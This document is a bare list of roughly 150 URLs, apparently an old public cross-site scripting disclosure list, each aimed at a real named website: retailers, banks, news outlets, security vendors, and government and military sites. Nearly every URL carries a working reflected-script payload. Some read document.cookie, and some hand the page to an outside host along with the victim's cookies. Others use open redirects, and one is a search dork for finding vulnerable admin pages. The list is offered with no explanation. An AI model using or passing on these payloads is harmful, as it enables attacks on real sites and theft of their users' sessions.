http://www.hooters.com/news_and_events/calendar/index.asp?req_event=&req_state=asdf--%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx%20x=%22&submit=Search&c_date=&req_yr= http://www.pricegrabber.com/search_attrib.php?form_keyword=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&topcat_id=&page_id=5&lo_p=0&hi_p=0 http://www.xfxforce.com/web/search.jspa?query=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&searchIn=gamersCentral&searchIn=support&searchIn=product&searchIn=news&searchIn=feature http://castle.pricewatch.com/s/search.asp?s=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E http://www.cyberguys.com/templates/searchall.asp?search=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E http://www.gotdotnet.com/GDNSearch.aspx?query=&Sites=(www.GotDotNet.com http://www.sonystyle.com/is-bin/INTERSHOP.enfinity/eTS/Store/en/-/USD/SY_Email_Subscription-Create?source=LC&mailpref=Y&email=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%40yahoo.com http://www.alliedelec.com/Search/SearchResults.asp?N=0&page=no_results&Ntt=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E&sid=451B10801174E17F&i= http://www.mouser.com/search/Refine.aspx?Ne=1447464+254016&Ntt=*%3e%3cscript%3ealertXSS%3cscript%3e*&Ntx=mode%2bmatchall&Mkw=%22%3e%3cscript%3ealert('XSS')%3c%2fscript%3e&N=1323038&Ntk=Mouser_Wildcards http://www.newark.com/NewarkWebCommerce/newark/en_US/endecaSearch/searchPage2.jsp;jsessionid=2KVVR5G302HOOCXDUY2SFFYK2OTCIIV1?Ntt=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&searchtype=mfg&Nty=1&N=0&Ntk=gensearch http://www.jameco.com/webapp/wcs/stores/servlet/CatalogSearchResultView?langId=-1&storeId=10001&catalogId=10001&searchValue=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&searchType=m http://www.buy.com/retail/searchresults.asp?querytype=home&qu=%2D%2D%3E%3Cscript%3Ealert%28String%2EfromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E%3Cscript%3E%3C%21%2D%2D&qxt=home&display=&dclksa=1 http://cars.kbb.com/go/search/advanced_search.jsp?error=ERR_INV_ZC&tracktype=usedcc&searchType=22&yearType=popular&cid=&dlid=&dgid=&amid=&cname=&zc=%26amp%3Bamp%3B&makeid=1&modelid=&pageNumber=0&numResultsPerPage=50&largeNumResultsPerPage=0&sortorder=descending&sortfield=PRICE+descending&certifiedOnly=false&criteria=&aff=carskbb&aff=carskbb http://www.engadget.com/search/?q=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E http://www.lww.com/search/advancedsearch/?rowStart=1&title=&author=&ISBN=&keyword=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&exactTerm=1&allFields=1&yearFrom=&yearThru=&productTypes=&mediaTypes=&source=qs&action=search http://search.gifts.com/?q=%22%3Balert%28%27xss%27%29%3Bvar+str%3D%22&x=26&y=6 http://www.linuxdevices.com/cgi-bin/search_view.cgi?snews=checked&sarticle=checked&sk=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&st=all&view=Search&ss=newest http://www.gamerankings.com/itemrankings/Itemsearch.asp?Itemname=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&extsearch=0 http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=intext%3Asearch+site%3Adigg.com+intitle%3Asearch+inurl%3Asearch&btnG=Search http://www.cbsnews.com/stories/2005/09/26/search/main886284.shtml?source=cbsnews&searchString=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&sort=1&type=all&num=10&offset=0&x=54&y=9 http://www.travelport.com/en/search/index.cfm?qt=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.whalecommunications.com/site/whale/corporate/Whale.asp?pi=24&topSearchText=whale%22%3E%3Cscript%3Ealert('XSS+with+Secure+Remote+Access+from+Anywhere')%3C/script%3E http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://portal.knowledgebase.net/display/4n/login.asp&aid=&t=&searchstring=&search=&cat=&catURL=&cpid=10213&username=XSS%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx%20x=%22&password=&rememberme=on http://searchsecurity.techtarget.com/search/1,293876,sid14,00.html?query=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&bucket=ALL http://search.ittoolbox.com/default.asp?r=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&Submit1=Search http://shops.ancestry.com/searchresultslist.asp?searchstring=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.youtube.com/categories_portal&c=2&search=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E http://www.darkreading.com/document.asp?doc_id=104815 http://www.youtube.com/groups_create?group_name=xss%22%3E%3Cscript%3Ealert('xss1')%3C/script%3E&tags=xss2%22%3E%3Cscript%3Ealert('xss2')%3C/script%3E http://www.gesecurity.com/portal/site/GESecurity/template.PAGE/menuitem.5618f8037e6d3a0c8e6e9510c4030730/?javax.portlet.tpst=2080500d1d974fba0c39142cc4030730&javax.portlet.prp_2080500d1d974fba0c39142cc4030730_viewID=MY_PORTAL_VIEW&javax.portlet.begCacheTok=token&javax.portlet.endCacheTok=token&withinQuery1=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.safer-networking.org/index.php?page=search&lang=en&submit=&quickquery=%22%2F%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E&submit.x=0&submit.y=0&submit=%3E http://www.nasdaq.com/portfolio/ptform2.asp?site=&sitesubtype=&email=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&name=&submit=Submit http://www.amex.com/quickquote/error.jsp?fldMessage=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://www.borsaitaliana.it/bitApp/login.bit?username=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&password=&submit.x=26&submit.y=14 http://www.asx.com.au/asx/about/Feedback.jsp?referred='--%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://searchsecurity.techtarget.com/search/1,293876,sid14,00.html?query=%27%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&bucket=ALL http://www.hummingbird.com/SEARCH/search.html?searchText=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&searchType=Basic&Search.x=0&Search.y=0&Search=Search http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.usenext.com/UseNextDE/shopInt/obj/user/usShowLostPassword.cfm%3fSNUUID=1&sEmail=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E http://morpheus.com/contact.asp?ref=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E http://www.downloadsquad.com/search/?q=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E http://www.pbs.org/search/search_results.html?q=&neighborhood=none http://www.marketwatch.com/news/newsfinder/default.asp?value=%22%3Balert%28%27xss%27%29%3Bs.prop18=%22&property=word&doctype=806&scid=3&ctl25.x=6&ctl25.y=11 http://www.tucows.com/search?search_terms=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&search_scope=lin&search_adv=0&search_size=&search_size_multi=b http://msdn.microsoft.com/library/default.asp?url=/workshop/author/dhtml/reference/methods/setexpression.asp http://cccure.org/modules.php?op=modload&name=MyHeadlines&file=index&myh=user&myh_op=show_all%22%3E%3Cscript%3Ealert(2)%3C/script%3E&eid=2474 http://cccure.org/modules.php?op=modload&name=MyHe http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://linksys.com/servlet/Satellite?email=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E&temp_email=&passcode='';!--&tenp_passcode='';!--&fieldsOnForm=email,passcode,&mag=&submitType=done&SubmittedElement=Linksys/ProductReg/CustomerLogin&childpagename=US/Layout&packedargs=siteid%3D1115416834707%26lang%3Den%26site%3DUS%26cid%3D1115416906014%26c%3DL_Content_C1&pagename=Linksys/Common/VisitorWrapper&FormName=reg&Attachment=false http://www.certicom.com/index.php?keywords=asdf%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E%3Cx+&Submit=Submit&action=res%2Csearch_site http://search4.unisys.com/especific/search_results.asp?qstr=asdf%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx+&totDocs=0&totFtDocs=0&qryoption=allofthewords&extension=&changeDisplay=0&qstrTemp=asdf%27e&SiteToSearch=http%3A%2F%2Fwww.unisys.com%2Fabout__unisys%2F*§ion=&Search=Search&summ=detailed&docsPP=20&s=&se=&b=about__unisys&p=3&e=none&sf=corporate&ci=about__unisys&ce=company__profile http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://www.truste.org/pvr.php%3fpage=complaint&PHPSESSID=3e5f80c5ff71a277bc238b19d650ad22&url=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E&_submit=Next http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://zme.amazon.com/exec/varzea/fx-register/process-login/102-5551194-3126502&login-customer=existing&login-email=XSSman&input-login-email=%22%3E%3CBODY+ONLOAD%3D'a=%22Your%20Cookies:%5Cn%5Cn%5Cn%22%2Bdocument.cookie;alert%28a%29'%3E%3Cx%20+&input-login-customer=existing&password=&x=0&y=0 http://www.afpc.randolph.af.mil/external.asp?url=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://search.access.gpo.gov/GPO/Search.asp?ct=GPO&q1=Weapons%20of%20Mass%20Destruction%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://ohrm.os.doc.gov/search/index.htm?ssUserText=Osama+Bin+Laden%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx+ http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.geeksquad.com/email/HighLevel.php&email=XSSman&Sign+Up.x=0&Sign+Up.y=0&Sign+Up=Sign+Up http://www.compusa.com/products/products.asp?N=0&Ntt=XSSman%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cx%20&Ntk=All&Nty=1&D=XSSman%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cx%20&Dx=mode%20matchall http://www.newegg.com/CustomerService/TrackOrder.asp?TrackingNumber=+XSSman%22%3E%3Cscr+ipt%3Ealert%28%22XSS%22%29%3C%2Fscr+ipt%3E%3Cx&Action=NEW http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.techpowerup.org/upload.php&MAX_FILE_SIZE=2097152&file=&url=http://asdf%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E&resize=0&dx=0&dy=0&watermark=9&tagline=&font=arial&textcol=%2523000000&size=12&bgcol=%2523FFFFFF&bgalpha=20&tagpos=1 http://searchg.symantec.com/search?q=%22%3Balert%28%27xss%27%29%3Bs.prop5%3D%22&site=symc_en_US&btnG.x=0&btnG.y=0&btnG=OK&hitsceil=100&sort=date%3AD%3AL%3Ad1&output=xml_no_dtd&client=symc_en_US&charset=utf-8&context=gbh&y=0&oe=UTF-8&ie=UTF-8&proxystylesheet=symc_en_US&x=0 http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://odds.proboards24.com/index.cgi?action=register2&username=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E http://www.tv/en-def-8b35e4129716/cgi-bin/multilookup.cgi?domain=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&tld=tv&x=0&y=0 http://knowledge.mcafee.com/SupportSite/search.do?languages=XSSman'%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx%20&rwTarget=%2FrfPlayerWidget.do&searchMode=GuidedSearch&searchString=&product=hhhhh&document=&cmd=search&productFamily=&contextType=gs https://www.zonelabs.com/store/application?namespace=zls_user&origin=login.jsp&event=button.login&zl_user_name=XSSman%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&destination=global.jsp&zl_user_password=&x=0&y=0 http://usa.kaspersky-labs.com/trials/trialsregHOME.php?aw=Trials+Page&ref=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E%3Cx%20&chapter=146481750 http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://usa.kaspersky-labs.com/trials/trials_postHOME.php&oid=00D300000000WYS&retURL=http%3A%2F%2Fusa.kaspersky-labs.com%2Ftrials%2Ftrial_thanks.php&Campaign_ID=Campaign_Adwords&aw=Trials+Page&ref=%5C&chapter=146481750&email=XSSman%22>@dev.null&Submit.x=0&Submit.y=0&Submit=Submit&optin=yes http://www.adidas.com/us/shared/legal.asp?strCountry=us&strBrand=%22);alert(%22XSS%22)%3C/SCRIPT%3E http://www.nike.com/nikewomen/index.jsp?skipflashdetection=true&skipflashdetection=X%0a http://www.ritzcamera.com/webapp/wcs/stores/servlet/MapQuestView?storeId=10001&catalogId=10001&languageId=-1&city=%22%3E%3Cimg%20src=foo%20onerror=alert('XSS');%3E%0a&state=&zipCode= http://www.fbi.gov/cgi-bin/outside.cgi?javascript:alert('xss') http://www.adidas.com/scripts/cud/cud.asp?call=registeremail&Postprocessor=http://tinyurl.com/jsfzv&dateofbirth_dd=1&dateofbirth_mm=1&dateofbirth_yyyy=1 http://techfinder.theinquirer.net/vnuinquirer/SearchServlet?ksAction=Search&col=vnulive&rf=0&srchtype=key&stype=&bi=1&ei=0&oq=qt%3A%2522%2Bonmouseover%253Dalert%2528%2527moo%2527%2529%253B@@col%3Avnulive@@type%3Akey@@ptype%3A@@sgroup%3A@@rf%3A0@@tax%3A0@@providerid%3A0@@ssn%3A0@@sid%3A10008348114@@datasource%3AVNUINQUIRER@@bi%3A1%7E%7E&vf=&tId=&sId=10008348114&sSeq=1®Id=&lsTime=null&type=kw&isAdv=false&kw=%22onmouseover%3D%22alert%28%27xss%27%29%3B http://www.knowledgestorm.com/SearchServlet?ksAction=Search&col=kslive&rf=0&srchtype=key&stype=&bi=1&ei=0&oq=null&vf=null&tId=&sId=&sSeq=1®Id=&lsTime=null&isAdv=false&kw=%22+onmouseover%3D%22alert%28%27xss%27%29%3B&x=14&y=7 http://search.forbes.com/search/find?action=advancedSearch&start=1&max=20&sort=Relevance&MT=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&pub=forbes.com%2Cmagazine%2Cfyi%2Cbest&author=&tickers=&pubDateStart=mm%2Fdd%2Fyyyy&pubDateEnd=mm%2Fdd%2Fyyyy&contentType=all&storyType=all&premium=on http://www.britannica.com/search?query=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&ct=&searchSubmit.x=0&searchSubmit.y=0 http://sitesearch.websidestory.com/?q=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&x=0&y=0 http://www2.jcpenney.com/jcp/SearchDepartment.aspx?SearchString=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E&JSEnabled=true&submit+search.x=5&submit+search.y=9 http://www.sears.com/sr/javasr/search.do?BV_UseBVCookie=Yes&vertical=Sears&keyword=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E&gobutton.x=9&gobutton.y=15 http://www.cbsnews.com/stories/2005/09/26/search/main886284.shtml?source=cbsnews&searchString=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E&sort=1&type=all&num=10&offset=0&x=22&y=10 http://www.foley.com/sitesearch.aspx?__VIEWSTATE=dDwtMTAxNzE5NTIxODt0PDtsPGk8MT47aTwyPjs%2BO2w8dDxwPHA8bDxUZXh0Oz47bDxcPHNwYW4gY2xhc3M9InRleHQxIlw%2BTG9va2luZyBmb3Igc29tZXRoaW5nIHNwZWNpZmljPyBTaW1wbHkgdHlwZSBhIHdvcmQgb3IgcGhyYXNlLCBjaG9vc2UgYSBzaXRlIHNlY3Rpb24gKG9yIGVudGlyZSBzaXRlKSwgdGhlbiBjbGljayB0aGUgU2VhcmNoIGJ1dHRvbi4gUGxlYXNlIGVuY2xvc2UgcGhyYXNlIHNlYXJjaGVzIGluIGRvdWJsZSBxdW90ZXMgZm9yIGdyZWF0ZXIgYWNjdXJhY3kuXDwvc3Bhblw%2BOz4%2BOz47Oz47dDw7bDxpPDU%2BOz47bDx0PHA8bDxUZXh0Oz47bDxcZTs%2BPjs7Pjs%2BPjs%2BPjs%2BgObD42gh%2Ba%2FMi1aqHRdfBrCPKY0%3D&SearchType=1&txtSearch=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E&selSection=&submit.x=18&submit.y=6 http://lawyers.findlaw.com/lawyer/lawyer_dir/search/jsp/stdSearch_process.jsp?stype=BY_ADDR_OR_ZIP&target=FIRM&keyword=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E&location=chicago%2C+il&Submit=Find+Lawyers%21 http://www.martindale.com/xp/Martindale/Lawyer_Locator/Search_Lawyer_Locator/search_result.xml?PG=0&STYPE=F&FNAME=&LNAME=&FN=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E&CN=&STS=1&CRY=1&ratind=&bc=1 http://www.twobirds.com/english/search/search_results.cfm?srchString=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E&search.x=9&search.y=10 http://www.boonebank.com/app/search.jsp?searchAction=search&search=glossary&searchglossary=search&searchtext=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E http://web.worldbank.org/external/default/main?menuPK=140710&pagePK=36912&piPK=36916&q=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E&theSitePK=4607 http://www.bankofireland.ie/site-search/htsearch?words=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E&Submit=GO http://www.mapquest.com/maps/map.adp?formtype=address&country=US&popflag=0&latitude=&longitude=&name=&phone=&level=&addtohistory=&cat=%3Cscript%3Ealert%28%27GeeWiz%27%29%3C%2Fscript%3E&address=&city=&state=&zipcode= http://www.chfhq.org/section/_search/?search_query=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E&x=9&y=8 http://www.banking.state.ny.us/cgi-bin/AT-HTML_Docssearch.cgi?sp=sp&mode=concept&search=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E&Search.x=83&Search.y=9 https://adcenter.microsoft.com/signup.aspx?adv_market=en-us%22;alert(1);s_account=%22&s_int=118 http://moneycentral.msn.com/loan/mortcalc.aspx?Price=%22%20style= http://moneycentral.msn.com/loan/mortcalc.aspx?Price=%22%20style=%22background-image:url(javascript:alert(2))%22%3E http://walmartstores.com/GlobalWMStoresWeb/search.do?subcatid=316&simplesearchfor=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&x=0&y=0 http://khelp.kohls.com/default.asp?question=%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%0D%0A&a=e-faqs-results http://www.videolan.org/mirror.php?mirror=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx%20&file= http://lifestyle.msn.com/HomeandGarden/BeJane/Article.aspx?cp-documentid=';alert(1);s='nn http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://testphp.acunetix.com/search.php?test=query&searchFor=%3Cscript%3Ealert(1)%3C/script%3E http://netsecurity.about.com/gi/dynamic/offsite.htm?zu=%22e%3Ee%3C/title%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cnoframes%3E.com http://search.yahoo.com/preferences/preferences?pref_done=data:text/html;base64,PGJvZHkgb25sb2FkPSJhbGVydCgneHNzJyk7Ij4= http://astrocenter.astrology.msn.com/msn/DeptChinWeek.aspx?When=1);alert(document.cookie&Af=-1000 http://www.prodigy.msn.com/Salud/Tusalud/SaludMedicinas/default.asp?id_articulo=%22%3E%3C/iframe%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.checksum.org/cso/search/?q=%22%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&x=0&y=0 http://search.disney.go.com/exec/?dym=1;i=1;land=1;m=1;oq= http://www.afcm.org/cgi-bin/advsearch/search.cgi?q= http://www.nhtsa.gov/exit.cfm?link=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E http://www.nationalservice.gov/about/search/search_results.asp?strSearchWords=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E http://www.americorps.gov/about/search/search_results.asp?strSearchWords= http://www.aoa.gov/search/search.asp?q=http://www.americorps.gov/about/search/search_results.asp?strSearchWords= http://w4.systranlinks.com/trans?lp=en_es&url= http://www.fcc.gov/fcc-bin/bye? http://www.genome.gov/search.cfm?searchString= http://search.state.nj.us/query.html?col=&ht=0&qp=&qs=&qc=&pw=100%25&la=en&charset=iso-8859-1&si=1&ws=0&qm=0&ql=&qt=&oldqt= http://www.usaid.gov/cgi-bin/goodbye?url=%3Cscript%3Ealert%28%GeeWiz%%29%3C%2Fscript%3E http://www.whitehouse.gov/cgi-bin/good-bye.cgi?url=http://ha.ckers.rog/ http://www.whitehouse.gov/cgi-bin/good-bye.cgi?url=javascript:alert(1 http://www.nist.org/nist_plugins/content/content.php?content.61 http://www.nist.gov/cgi-bin/wwwph/cso.nist.gov?Query=%3Cscript%3Ealert%28'XSS'%29%3C%2Fscript%3E http://www.nist.gov/cgi-bin/wwwph/cso.nist.gov?Query=XSS%20here%22%3E%3Cscript%3Ex=/%22/%3Balert('XSS')%3C/script%3E%3Cx http://www.nist.gov/cgi-bin/wwwph/cso.nist.gov?Query=bad%22bad http://www.drudgereportarchives.com/dsp/search.htm?searchFor=%3Cscript%3Ealert('xss')%3C/script%3E http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://search.bbb.org/&name=%22%3E%3CBODY%20onload=alert(%22XSS%22)%3E&city=&state=&searchtype=&phone=&search=Search&url= http://www.hotels.com/processSearch.do?allPropertyTypesSelected=true&destination=usertyped&usertypedcity=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&inout=&CIMonth=-1&CIDay=-1&CIYear=2006&COMonth=-1&CODay=-1&COYear=2006&numrooms=1&adults%5B0%5D=2&child%5B0%5D=0 http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.palms.com/sign_up.php&check_errors=1&email=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E&name=&birth_month=January&birth_day=1&birth_year=1966&street_address=&suite_address=&city=&state=&zip_code=&country=&phone_area=&phone_prefix=&phone_suffix=&visits=0-1&casino_credit=Yes&send_email=Yes&x=0&y=0 http://store.playboy.com/custserv/customerservicemain.jsp?cid=7&FName=Boobies%22%3E%3Cscript%3Ealert%28%22Buubies%21%22%29%3C%2Fscript%3E%3Cx+&LName=&Email=&Topic=&Message=&submit%2Ex=0&submit%2Ey=0 http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://example.com&submit.x=0&submit.y=0 http://www.sciencedaily.com/search/?keyword=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E http://govworks.com/.cfm?nft=1&t=5&p=1 http://www.ask.com/edittools?tool=%22;alert('xss');var http://search.lycos.com/?query=%3C%2Ftitle%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E http://govworks.com/as.cfm?nft=1&t=5&p=1 http://www.smallmouthbass.biz/google4/google/PHPgoogleSearch.php?q=asd%3Cbody+onload%3Dalert%28String.fromCharCode%2888%2C83%2C83%29%29%3E http://www.smallmouthbass.biz/google4/google2/google/PHPgoogleSearch5.php?q=asd%3Cbody+onload%3Dalert%28String.fromCharCode%2888%2C83%2C83%29%29%3E http://www.gahooyoogle.com/search.php?q=&st=asdf%22%3E%3Cframe%20onload=alert(String.fromCharCode(88,83,83))%3E http://www.seochat.com/?go=1&option=com_seotools&tool=36&keyword=asdf%22%3Cbody%20onload=%22document.write%20('XSS');alert('XSS')%22&toolsubmit=Compare http://www.nature.com/search/executeSearch?sp-q=%3C%2Ftitle%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&sp-c=10&sp-x-9=cat&sp-s=date&sp-q-9=NATURE&submit=go&sp-a=sp1001702d&sp-sfvl-field=subject%7Cujournal&sp-x-1=ujournal&sp-p-1=phrase&sp-p=all http://search.telstra.com/DarQuery.dll?MfcISAPICommand=MainFrame&query=%22 http://www.seek.com.au/jobsearch/index.ascx?DateRange=31&Keywords=%3Cscript%3Ealert(%27xss%27)%3B%3C%2Fscript%3E&searchfrom=quick http://content.monster.co.uk/sendtoafriend.asp?url='%3E%3Cscript%3Ealert('xss')%3C/script%3E http://hiring.monster.co.uk/products/bridgepage.aspx?bpredirect=http://google.com http://www.websiteoptimization.com/services/analyze/wso.php?url=http://www.google.com?%22%3E%3Cbody%20onload=alert(String.fromCharCode(88,83,83))%3E http://search2.google.cit.nih.gov/search?q=%3C%73%43%72%69%50%74%3E%61%6C%65%72%74%28%22%50%41%52%54%59%21%22%29%3C%2F%73%43%72%69%50%74%3E&site=CDRINKP&client=CDRINKP_frontend&proxystylesheet=CDRINKP_frontend&output=xml_no_dtd&filter=0&getfields=*&btnG.x=36&btnG.y=7 http://www.fema.gov/goodbye/goodbye.jsp?url=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E http://www.training.fema.gov/EMIWeb/cgi-shl/goodbye.asp?url= http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.citrix.com/English/contact/siteFeedback.asp%3fsite=&firstName=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E%26lastName%3D%26emailAddress%3D%26confirmEmail%3D%26likeMost%3D%26likeLeast%3D%26pleaseAdd%3D%26comments%3D%26submit.x%3D44%26submit.y%3D10 http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://mpaa.org/FlmRat_SrchReslts.asp&txtsearch=FuxxMPAA%22%3E%3Cscript%3Ealert(%22Yarrrr!%22)%3C/script%3E%3C!--e%20&x=0&y=0 http://www.ellenshop.com/search/?keywords1=XSS%27%3Balert%28%22XSS%22%29%3Bx%3D%27&method=all&collection=sitebuilder%2Fcatalog-345&x=0&y=0 http://whv.warnerbros.com/WHVPORTAL/Portal/product.jsp?OID=___%3Cscript%3Ealert(%22XSS%22)%3C/script%3E___ http://search.thawte.com/thawte/solutionDisplay.do?clusterName=DefaultCluster&groupId=1&docType=1006&docProp=$solution_id&docPropValue=vs21507&gotoLink=0asdf','_self');alert('Your%20thawte%20cookies%20are:%5Cn%5Cn'%2Bdocument.cookie%29;top.answer.location.replace('http://maluc.sitesled.com/xss.html&resultType=5002&directSolutionLink=1 http://search.thawte.com/thawte/solutionDisplay.do?clusterName=DefaultCluster&groupId=1&docType=1006&docProp=$solution_id&docPropValue=vs21507%0A%0D&gotoLink=0asdf','_self');top.answer.location.replace('http://maluc.sitesled.com/thawte.html&resultType=5002&directSolutionLink=1 https://www.thawte.com/cgi/support/contents.exe?Service=Personal&PersonalCertStep='unfilteredtoo%22lostpassword http://www.theiia.org/index.cfm?act=h.login&return=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx http://www.e-channelnews.com/ec_displaysearchresult.php?search_text=websites%20without%20XSS%20holes:%20%20None%20Found.%3Cscript%3Ealert%28String.fromCharCode(88,83,83)%29%3C%2Fscript%3E&Submit.x=0&Submit.y=0&Submit=Submit http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://www.isaca.org/Template.cfm%3FSection=Home%26Template=/Security/NoPassword.cfm&EmailAddress=sadness%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx+&LookupButton.x=0&LookupButton.y=0 http://www.securityspace.com/scontact/docontact.html?email=sadness%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx+&Subject=&Body=&email2=MTE2MDY1NTE4Ng%3D%3D http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.itsecurity.com/expert/ask-a-question/&qauthor=Better+Expert%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E%3Cx+&qemail=&question=&submit=1&x=0&y=0 https://secure.comodo.net/products/Checkout?SID=Z804x6hh2L8wqrwW&successURL=https%3A//www.hackerguardian.com%3A443/sas/user/free/licence_getting_success.jsp%3FerrorCode%3D0%26orderNumber%3D1261293&cancelURL=none&confirmURL=none http://www.buy.com/retail/searchresults.asp?querytype=home&qu=%27%27%29%7B%7D%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E&qxt=home&display=col&dclksa=1 http://www.brazilianfightwear.com/store/Admin/include/errorwindow.asp?lng=English&Message_Id=5&Message_Add=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://www.google.com/search?hl=en&lr=&q=Admin%2Finclude%2Ferrorwindow.asp&btnG=Search 